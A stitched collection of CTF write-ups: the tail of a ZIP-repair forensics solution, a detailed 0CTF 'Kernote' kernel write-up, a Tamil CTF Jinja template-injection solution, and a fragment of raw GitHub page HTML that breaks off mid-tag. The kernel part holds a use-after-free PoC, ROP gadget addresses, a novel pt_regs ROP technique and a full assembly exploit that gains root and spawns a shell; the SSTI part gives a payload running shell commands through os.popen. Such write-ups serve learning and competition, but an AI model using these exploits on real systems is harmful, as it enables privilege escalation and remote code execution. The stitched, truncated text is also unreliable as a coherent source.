Ok, we identified two blocks, let find last part (End of central directory record) ```\x50\x4b\x05\x06```
Good we found it and template can be automatically applied by offset 0x17h but it is not necessary because last record have structure with only one variable (ZIP file comment) and its length equals 0 in our case So, let split or file for already identified parts
Ok, we identified the most parts and as we remember we have first part unfinished with 5 bytes missing of extrafield 0x7875h
Let try to find information about that field, first link in google gives us information 
So, we are missing one byte size and GID which in our case should be 5 bytes and judging by other headers it has value ```\x04 \x00 \x00 \x00 \x00``` and we can find it right after Central directory file block and also we see file data after it
Let see what we have now
two parts missing is out data it should be placed right after local file headerLet create new file from parts 1-2-data1-data2-3-4-5 and apply template to check that all parts are in right offsets
The last thing we have to check is the right order of data blocks save the file and test it with any zip extractor.We got crc error so now we have to change order of data blocks and extract file.
After extracting archive we got file with content ```54616d696c4354467b315f6c3076335f6731375f776834375f61623075745f7930757d0a``` It gives us flag ```TamilCTF{1_l0v3_g17_wh47_ab0ut_y0u}``` |
# Kernote
**Authors:** [Nspace](https://twitter.com/_MatteoRizzo)
**Tags:** pwn, kernel
**Points:** 750
> Let's try kernote in kernel> > nc 42.192.68.11 12345> [Attachment](https://attachment.ctf.0ops.sjtu.cn/kernote_3157feafdcfaf6dcfa356a04ad57a056.tar.gz)> or [Attachment(MEGA)](https://mega.nz/file/axoHVaTa#cl_YEcpSn3W094l65jYVKugt0DWucl1YnuDGqq_OVN4)
## Analysis
This is a kernel pwn challenge. The challenge uses the usual setup: a QEMU VMrunning Linux with a vulnerable module. We get an unprivileged shell in the VMand we have to exploit the kernel to become root and read the flag.
```$ lsbzImage readme.md rootfs.img run.sh
$ cat readme.mdHere are some kernel config options in case you need itCONFIG_SLAB=yCONFIG_SLAB_FREELIST_RANDOM=yCONFIG_SLAB_FREELIST_HARDENED=yCONFIG_HARDENED_USERCOPY=yCONFIG_STATIC_USERMODEHELPER=yCONFIG_STATIC_USERMODEHELPER_PATH=""
$ cat run.sh#!/bin/shqemu-system-x86_64 \-m 128M \-kernel ./bzImage \-hda ./rootfs.img \-append "console=ttyS0 quiet root=/dev/sda rw init=/init oops=panic panic=1 panic_on_warn=1 kaslr pti=on" \-monitor /dev/null \-smp cores=2,threads=2 \-nographic \-cpu kvm64,+smep,+smap \-no-reboot \-snapshot```
All the usual mitigations are enabled (SMEP, SMAP, KASLR, KPTI, ...). The kernelalso uses the SLAB allocator instead of the default SLUB and disables usermodehelpers by hardcoding their path to "". Furthermore the VM will shut downimmediately if we cause any kernel warnings or panics.
`rootfs.img` is an ext4 disk. We can mount it to extract the files:
```$ mount -o loop rootfs.img mount
$ ls mountbin dev etc flag init kernote.ko linuxrc lost+found proc sbin sys tmp usr
$ cat mount/init#!/bin/shmount -t proc none /procmount -t sysfs none /sysmount -t tmpfs tmpfs /tmp#mount -t devtmpfs devtmpfs /devmkdir /dev/ptsmount -t devpts devpts /dev/ptsecho /sbin/mdev>/proc/sys/kernel/hotplugecho 1 > /proc/sys/kernel/dmesg_restrictecho 1 > /proc/sys/kernel/kptr_restrictecho "flag{testflag}">/flagchmod 660 /flaginsmod /kernote.ko#/sbin/mdev -schmod 666 /dev/kernotechmod 777 /tmpsetsid cttyhack setuidgid 1000 shpoweroff -f```
`kptr_restrict=1` prevents us from reading kernel addresses from`/proc/kallsyms` and `dmesg_restrict=1` prevents us from reading the kernel logs.
The interesting part is `kernote.ko`, the kernel module which contains thevulnerable code. My teammate [busdma](https://twitter.com/busdma) reverseengineered the module and quickly spotted some bugs. Here is the (cleaned up)decompilation.
```cuint64_t *buf[16];uint64_t *note;int major_num;struct class *module_class;struct device *module_device;spinlock_t spin;
int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg);
const struct file_operations kernote_fo = { .unlocked_ioctl = kernote_ioctl,};
int module_init(void){ major_num = register_chrdev(0LL, "kernote", &kernote_fo); if (major_num < 0) { printk(KERN_INFO "[kernote] : Failed to register device\n"); return major_num; }
module_class = class_create(THIS_MODULE, "kernote", &module_device); if (IS_ERR(module_class)) { unregister_chrdev(major_num, "kernote"); printk(KERN_INFO "[kernote] : Failed to create class\n"); return PTR_ERR(module_class); }
module_device = device_create(module_class, NULL, MKDEV(major_num, 0), NULL, "kernote"); if (IS_ERR(module_device)) { class_destroy(module_class); unregister_chrdev(major_num, "kernote"); printk(KERN_INFO "[kernote] : Failed to create device\n"); return PTR_ERR(module_device); }
printk(KERN_INFO "[kernote] : Insert module complete\n"); return 0;}
int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg){ int ret;
raw_spin_lock(&spin);
switch (cmd) { // alloc note case 0x6667: if (arg > 15) { ret = -1; break; }
uint64_t *newnote = kmalloc(32, GFP_KERNEL); buf[arg] = newnote; if (newnote == NULL) { ret == -1; break; }
ret = 0; break;
// free note case 0x6668: if (arg > 15 || buf[arg] == NULL) { ret = -1; break; }
kfree(buf[arg]); buf[arg] = 0; ret = 0; break;
// set note pointer case 0x6666: if (arg > 15) { ret = -1; break; }
note = buf[arg]; break;
// write note case 0x6669: if (note) { *note = arg; ret = 0; } else { ret = -1; } break;
// inc refcount? case 0x666a: struct user_struct *user = current_task->cred->user; refcount_inc(&user->__count); if (user->uid != 0) { printk(KERN_INFO "[kernote] : ********\n"); ret = -1; } else if (note != NULL) { printk(KERN_INFO "[kernote] : 0x%lx\n", *note); ret = 0; } else { printk(KERN_INFO "[kernote] : No note\n"); ret = -1; } break; }
spin_unlock(&spin); return ret;}```
The first bug is that note can point to freed memory if we set it to the addressof a note and then free that note. The second bug is that command `0x666a`increments the `user_struct`'s refcount but never decrements it. The second bugis useless because overflowing a refcount triggers a warning which shuts downthe VM immediately, but the first bug looks promising. Later during the CTF theauthor of the task confirmed that the second bug was unintentional.
Command `0x666a` looks like it might leak the contents of a note, but inpractice it only does so when invoked by root and it logs the contents to dmesg,which we can't access. Either way it's not useful.
In conclusion, the bug lets us overwrite the first 8 bytes of a freed chunk inkmalloc-32. The challenge is to somehow use that to get root.
## Exploitation
After reverse engineering the module busdma also wrote a PoC exploit that crashesthe kernel with a controlled RIP. The PoC frees a note and reclaims the freedchunk with a [`struct seq_operations`](https://elixir.bootlin.com/linux/latest/source/include/linux/seq_file.h#L31), which is heap allocated in kmalloc-32 and contains a function pointerin the first 8 bytes. It then uses the bug to overwrite the function pointer andreads from the seq file to call the overwritten pointer.
```c#define SET_NOTE 0x6666#define ALLOC_ENTRY 0x6667 #define FREE_ENTRY 0x6668#define WRITE_NOTE 0x6669
static int kfd;
static int set_note(uint64_t idx){ return ioctl(kfd, SET_NOTE, idx);}
static int alloc_entry(uint64_t idx){ return ioctl(kfd, ALLOC_ENTRY, idx);}
static int free_entry(uint64_t idx){ return ioctl(kfd, FREE_ENTRY, idx);}
static int write_note(uint64_t val){ return ioctl(kfd, WRITE_NOTE, val);}
int main(void){ kfd = open("/dev/kernote", O_RDWR); assert(kfd > 0);
for (int i = 0; i < 0x100; i++) { alloc_entry(0); } alloc_entry(1); set_note(1); free_entry(1);
int fd = open("/proc/self/stat", O_RDONLY);
write_note(0x4141414141414141);
char buf[32] = {}; read(fd, buf, sizeof(buf));
return 0;}```
```[ 3.856543] general protection fault, probably for non-canonical address 0x4141414141414141: 0000 [#1] SMP PTI[ 3.858362] CPU: 0 PID: 141 Comm: pwn Tainted: G OE 5.11.9 #2[ 3.859598] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014[ 3.861074] RIP: 0010:__x86_indirect_thunk_rax+0x3/0x5[ 3.861995] Code: 06 d7 ff 31 c0 e9 43 06 d7 ff <...>[ 3.865260] RSP: 0018:ffffc90000253dc0 EFLAGS: 00010246[ 3.866187] RAX: 4141414141414141 RBX: ffffc90000253e60 RCX: 0000000000000000[ 3.867440] RDX: 0000000000000000 RSI: ffff888004d47be0 RDI: ffff888004d47bb8[ 3.868698] RBP: ffffc90000253e18 R08: 0000000000001000 R09: ffff888003c63000[ 3.869960] R10: ffffc90000253e68 R11: 0000000000000000 R12: 0000000000000000[ 3.871217] R13: ffff888004d47bb8 R14: ffff888004d47be0 R15: ffffc90000253ef0[ 3.872474] FS: 0000000001e68380(0000) GS:ffff888007600000(0000) knlGS:0000000000000000[ 3.873898] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033[ 3.874914] CR2: 000000000048afd0 CR3: 0000000004cca000 CR4: 00000000003006f0```
This is a great starting point but it's not enough to own the kernel. We can'tdirectly jump to some code in userspace because of SMEP + KPTI. We also can't(seemingly) start a ROP or JOP chain right away because we don't control thecontents of any of the registers or the memory they point to (except rax whichcontains our overwritten function pointer).
My goal at this point was to try and use our bug to get arbitrary read and writein the kernel.
My first idea was to overwrite a freelist pointer. By default the first 8 bytesof a free kmalloc chunk contain the freelist pointer and we can easily getarbitrary r/w by overwriting that. Unfortunately this challenge doesn't use thedefault allocator. Instead the author enabled the older SLAB allocator whichstores metadata out-of-line and prevents this attack.
My second idea was to corrupt the next pointer of a `msg_msgseg`. I had playedcorCTF about 1 month earlier and spent a lot of time failing to pwn the `Fire ofSalvation` kernel challenge. That challenge let us overwrite the first 40 bytesof a freed chunk in kmalloc-4k, which is somewhat similar to what we have here.You can find the author's writeup for that challenge [here](https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html).We can reclaim the freed note with a 32-byte `msg_msgseg`, which contains apointer to the next `msgseg` in the first 8 bytes, then hopefully use that toget arbitrary read and write, just like in that challenge. Unfortunately Icouldn't turn this into an arbitrary kernel r/w, even though I could crash thekernel with an arbitrary pointer dereference. The reason is that the bug doesn'tlet us overwrite the `m_ts` field of `msg_msg`, so the kernel will stop readingand writing after the first `msg_msgseg`.
After spending hours on this idea and ultimately ruling it out I went back tobusdma's crash PoC and started looking for controllable memory in GDB. Ieventually noticed that there were a lot of what looked like userspace pointersnear the bottom of the kernel's stack:

After looking at the system call handler for a bit it became clear that theseare the saved userspace registers. One of the first things the system callhandler does is to [push](https://elixir.bootlin.com/linux/v5.11.9/source/arch/x86/entry/entry_64.S#L115) a `struct pt_regs` on the stack.[`pt_regs`](https://elixir.bootlin.com/linux/v5.11.9/source/arch/x86/include/uapi/asm/ptrace.h#L44)contains the values of all the registers at the moment the system call wasinvoked. As far as I can tell all registers are [saved](https://elixir.bootlin.com/linux/v5.11.9/source/arch/x86/entry/calling.h#L100) on every syscall,despite what the comment on `pt_regs` says. Obviously the contents of `pt_regs`are fully controlled by userspace, minus some constraints such as that `rax`must contain the correct system call number.
```cstruct pt_regs { unsigned long r15; unsigned long r14; unsigned long r13; unsigned long r12; unsigned long rbp; unsigned long rbx; unsigned long r11; unsigned long r10; unsigned long r9; unsigned long r8; unsigned long rax; unsigned long rcx; unsigned long rdx; unsigned long rsi; unsigned long rdi; unsigned long orig_rax; unsigned long rip; unsigned long cs; unsigned long eflags; unsigned long rsp; unsigned long ss;};```
At this point I had an idea: what if we could store a ROP chain in the contentsof `pt_regs`? `r8`-`r15`, `rbx`, and `rbp` are ignored by the `read` syscall andcan contain any value (except `r11` which contains the saved `rflags`). Thisgives us about 80 bytes of contiguous controlled memory. Is this enough to fita ROP chain that gives us root and returns to userspace without crashing? Canwe even move the stack pointer to the beginning of the controlled area in asingle gadget?
As luck would have it, the answer to the second question is yes! I found thisgadget that moves the stack pointer by just the right amount when invoked fromthe overwritten `seq_operations` pointer:
```0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret; ```
But still, 80 bytes is really not a lot. Can we fit our ROP chain in so littlespace? A typical payload used to get root in kernel exploits calls`commit_creds(prepare_kernel_cred(NULL))`. Doing this uses 32 bytes in our ROPchain. However in addition to this we have to return to userspace cleanly, orwe will crash the VM before we can use our newly-acquired root credentials.Returning to userspace takes an additional 40 bytes because we need to set `rcx`to a valid userspace address and `r11` to valid flags before we can ROP to`syscall_return_via_sysret`. This comes in at 72 bytes, just below of our 80byte budget. We can further optimize this down to 64 bytes if we do`commit_creds(&init_cred)` instead, and skip `prepare_kernel_cred`. `init_cred`is the `cred` structure used for the init process and it's located in thekernel's data section. Our final ROP chain then looks like this:
```r15: 0xffffffff81075c4c: pop rdi; retr14: 0xffffffff8266b780: &init_credr13: 0xffffffff810c9dd5: commit_credsr12: 0xffffffff810761da: pop rcx; retrbp: < address of our code in userspace >rbx: 0xffffffff8107605a: pop r11; retr11: < valid rflags value >r10: 0xffffffff81c00109: return from syscall```
We need precise control over the values stored in the registers when we invokethe syscall handler. We need to recover our userspace stack after returning.This is probably possible in C but I figured I should write a helper functionin assembly instead, to have more precise control over the registers. The`syscall` instruction already stores the current value of `rflags` in `r11` sowe don't have to set that register.
```x86asmpwn: mov [user_rsp], rsp mov r15, 0xffffffff81075c4c mov r14, 0xffffffff8266b780 mov r13, 0xffffffff810c9dd5 mov r12, 0xffffffff810761da lea rbp, [.after_syscall] mov rbx, 0xffffffff8107605a mov r10, 0xffffffff81c00109 ; SYS_read xor eax, eax syscall.after_syscall: mov rsp, [user_rsp] ret
user_rsp: dq 0```
Combined with the `seq_operations` exploit this makes us root, and we can simplyread and print the flag or `execve` a shell after returning to userspace.
There is still an elephant in the room though. So far we have assumed that weknow the address of all of these gadgets, and yet we still have absolutely noleaks of kernel addresses or a way to bypass KASLR.
Luckily for us even with KASLR the base address of the kernel is not very random.In fact there are only 512 possible addresses at which the kernel will loaditself. This is small enough that we can brute force it in a reasonable amountof time. We will keep trying our exploit assuming that the kernel's base addressis `0xffffffff81000000` (same as if there was no KASLR) and eventually we willsucceed. We are nearly guaranteed to succeed at least once if we run the exploit~2000 times. In our experiments running the exploit against the remote systemtook about 5-10 seconds. We did some napkin math and concluded that we shouldbe able to get the flag in about an hour or two by running multiple instancesof the exploit in parallel. Since we still had several hours left before theend of the CTF we decided to go with that. We got the flag after about an hour.
I ended up writing an optimized version of the exploit entirely in assembly tomake it smaller and speed up the brute forcing. The target VM has no internetaccess so we have to upload the exploit through the VM's serial port which takesa long time. Even when using UPX and musl, the C exploit was about 18KB. Theexploit written in assembly is only 342 bytes when gzipped, so it uploads muchfaster.
```x86asm; Keep running this exploit until it works, which should take about 512 tries.; Or alternatively find a KASLR bypass :)
; Emit 64-bit code.bits 64; Use RIP-relative addressing by default.default rel; Load at this addressorg 0x40000000
ELFCLASS64 equ 2ELFDATA2LSB equ 1EV_CURRENT equ 1ELFOSABI_NONE equ 0ET_EXEC equ 2EM_X86_64 equ 62PT_LOAD equ 1PF_X equ 1PF_W equ 2PF_R equ 4O_RDONLY equ 0O_RDWR equ 2
; 64-bit ELF header.elfh: ; e_identdb 0x7f, 'ELF', ELFCLASS64, ELFDATA2LSB, EV_CURRENT, ELFOSABI_NONE, 0, 0, 0, 0, 0, 0, 0, 0; e_typedw ET_EXEC; e_machinedw EM_X86_64; e_versiondd EV_CURRENT; e_entrydq _start; e_phoffdq phdr - $$; e_shoffdq 0; e_flagsdd 0; e_ehsizedw ehsize; e_phentsizedw phsize; e_phnumdw 1; e_shentsizedw 0; e_shnumdw 0; e_shstrndxdw 0
; Size of the elf header.ehsize equ $ - elfh
; 64-bit program header.phdr:; p_type;dd PT_LOAD; p_flags;dd PF_R | PF_W | PF_X; p_offset;dq 0; p_vaddr;dq $$; p_paddr;dq $$; p_filesz;dq filesize; p_memsz;dq filesize; p_align;dq 0x1000
phsize equ $ - phdr
exit: mov eax, 60 syscall ud2
open: mov eax, 2 syscall ret
ioctl: mov eax, 16 syscall ret
execve: mov eax, 59 syscall ud2
set_note: mov edx, edi mov edi, [kfd] mov esi, 0x6666 jmp ioctl
alloc_entry: mov edx, edi mov edi, [kfd] mov esi, 0x6667 jmp ioctl
free_entry: mov edx, edi mov edi, [kfd] mov esi, 0x6668 jmp ioctl
write_note: mov rdx, rdi mov edi, [kfd] mov esi, 0x6669 jmp ioctl
pwn: mov [user_rsp], rsp ; 0xffffffff81075c4c: pop rdi; ret mov r15, 0xffffffff81075c4c ; 0xffffffff8266b780: init_cred mov r14, 0xffffffff8266b780 ; 0xffffffff810c9dd5: commit_creds mov r13, 0xffffffff810c9dd5 ; 0xffffffff810761da: pop rcx; ret mov r12, 0xffffffff810761da lea rbp, [.after_syscall] ; 0xffffffff8107605a: pop r11; ret mov rbx, 0xffffffff8107605a ; 0xffffffff81c00109: return from syscall mov r10, 0xffffffff81c00109 xor eax, eax syscall.after_syscall: mov rsp, [user_rsp] ret
_start: ; kfd = open("/dev/kernote", O_RDWR) lea rdi, [devpath] mov esi, O_RDWR call open mov [kfd], eax
; for (int i = 0; i < 0x100; i++) { ; alloc_entry(0); ; } mov r8d, 0x100.sprayloop: xor edi, edi call alloc_entry dec r8d jnz .sprayloop
; alloc_entry(1) mov edi, 1 call alloc_entry ; set_note(1) mov edi, 1 call set_note ; free_entry(1) mov edi, 1 call free_entry
; statfd = open("/proc/self/stat", O_RDONLY) lea rdi, [statpath] mov esi, O_RDONLY call open mov [statfd], eax
; 0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret; ; write_note(0xffffffff81516ebe) mov rdi, 0xffffffff81516ebe call write_note
; pwn(statfd, buf, sizeof(buf)) mov edi, [statfd] lea rsi, [buf] mov edx, bufsize call pwn
; execve("/bin/sh", {"/bin/sh", NULL}, NULL) lea rdi, [shell_path] lea rsi, [shell_argv] xor edx, edx jmp execve
user_rsp: dq 0kfd: dd 0statfd: dd 0shell_argv: dq shell_path, 0buf: times 32 db 0bufsize equ $ - buf
devpath: db '/dev/kernote', 0statpath: db '/proc/self/stat', 0shell_path: db '/bin/sh', 0
filesize equ $ - $$```
```flag{LMm2tayzwWEzGpnmoyyf8zoTmk6X5TQrL45o}```
## Intended solution
It is pretty clear that this solution is not what the author intended, butit was still fun and it got us a flag which is what counts. The intendedsolution was to overwrite a freed `ldt_struct`. You can find the author's ownwriteup [here](https://github.com/YZloser/My-CTF-Challenges/tree/master/0ctf-2021-final/kernote).
## Conclusion
Thanks to busdma for the help with reversing and the initial PoC exploit and tomy teammates for letting me bounce ideas off of them. Thanks to 0ops and eee forthe amazing CTF, we really had a lot of fun playing this one. Looking forwardto next year's edition :).
I don't know if using `pt_regs` as ROP chain is a new technique or not. I'venever heard of it before and I couldn't find anything on Google. It seems prettypowerful though: it only requires RIP control and bypasses all mitigationsexcept KASLR, assuming that the kernel has the right gadgets. Let me know ifit's been used before somewhere. |
# Tamil CTF 2021 - Open Flag### Description:What is open flag challenge ? I will tell the location of flag where its located, you just need to access that flag.### Finding the vulnerability:The given website consists of 2 pages: A registration panel and a static page.


We notice that upon entering a username it gets reflected on the static page. After trying to inject some payloads we notice that user input is not sanitized.

Therefore we can test the website for Server Side Template Injections. We discover that they use jinja templating engine. Using a simple payload like the one below we can confirm the vulnerability. ```python{{7*7}}```
### Solution:Using the crafted payload below we can exploit the SSTI and get code execution.
```python{{config.__class__.__init__.__globals__['os'].popen('base64 flag.jpg').read()}}```This will reflect the flag image in the static html page base64 encoded. Save response in a txt file and decode with:```bashbase64 -d flag.txt > flag.jpg```Flag is presented in the image.

Happy hacking :) |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" 